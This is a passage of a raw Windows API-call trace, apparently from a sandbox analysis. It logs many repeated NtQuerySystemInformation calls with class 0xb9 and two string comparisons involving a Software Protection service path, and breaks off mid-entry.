NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0287.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0287.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0287.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0287.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x28, ResultLength=0x0) [0287.097] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0287.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0287.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0287.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0287.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0287.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0287.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0287.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0287.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0287.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x28, ResultLength=0x0) [0287.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x28, ResultLength=0x0) [0287.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x20, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x20, ResultLength=0x0) [0287.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0287.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0287.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0287.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x28, ResultLength=0x0) [0287.114] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0287.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0287.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0287.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0287.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0287.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0287.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0287.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0287.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0287.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x28, ResultLength=0x0) [0287.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x28, ResultLength=0x0) [0287.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0287.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x20, ResultLength=0x0) [0287.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0287.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0287.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0287.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0287.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x20, ResultLength=0x0) [0287.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0287.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0287.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0287.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0287.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0287.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0287.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0287.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0287.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0287.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0287.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0287.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0287.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0287.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0287.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x28, ResultLength=0x0) [0287.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0287.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0287.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0287.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c890, Length=0x20, ResultLength=0x0) [0287.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0287.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0287.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0287.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0287.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0287.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0287.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0287.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0287.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0287.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0287.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0287.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0287.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0287.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0287.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0287.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0287.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0287.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0287.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0287.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0287.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x28, ResultLength=0x0) [0287.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0287.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0287.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.163] NtQuerySystemInformation 